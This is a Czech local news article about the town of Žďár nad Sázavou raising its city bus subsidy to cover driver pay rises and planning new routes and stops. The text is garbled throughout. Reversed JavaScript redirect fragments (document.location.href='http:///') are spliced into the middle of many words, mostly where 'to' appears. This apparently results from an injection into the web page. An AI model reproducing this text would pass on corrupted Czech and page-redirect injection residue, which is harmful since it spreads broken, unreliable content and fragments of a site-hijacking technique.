Rainbow page separator

Doplatek na MHD je vyšší kvůli povinnému navýšení platů řidičů

Pondělí, 15. května 2017

Žďár nad Sázavou / O celkem 1,3 milionu korun je třeba zvýšit doplatek na žďárskou hromadnou dopravu, radní zastupitelům doporučili přijmout rozpoč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové opatření. Z 1,3 milionu jde podle vedení města o 1,1 milionu na navýšení platů řidičů, které schválila vláda, avšak peníze poukázala pouze krajům na linkové au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové spoje. Města, která provozují MHD, příspěvek na navýšení platů řidičů nedostala.
V loňském roce na provoz MHD žďárská radnice doplácela 6,5 milionu korun, le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude o 1,3 milionu korun více. V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce se ale se zvyšováním jízdného nepočítá. „Nechceme si pro peníze, které přidáváme na MHD, jít za cestujícími formou vyššího jízdného, ale v dalších letech k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu budeme muset přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit,“ sdělil starosta Žďáru Zdeněk Navrátil.
Od 1. července bude žďárská MHD jezdit v novém režimu, změní se její trasování i značení linek. Přibudou rovněž dvě nové zastávky ve čtvrti Klafar, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v ulicích Libická a Sázavská. Ty však budou začleněny do provozu až v průběhu července, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože vybudování zastávky v ulici Libická bude předcházet nutná přeložka vodovodních rozvodů.
Představení nové městské hromadné dopravy se uskuteční při setkání s občany 16. května v 17 hodin v jídelně základní školy v Palachově ulici.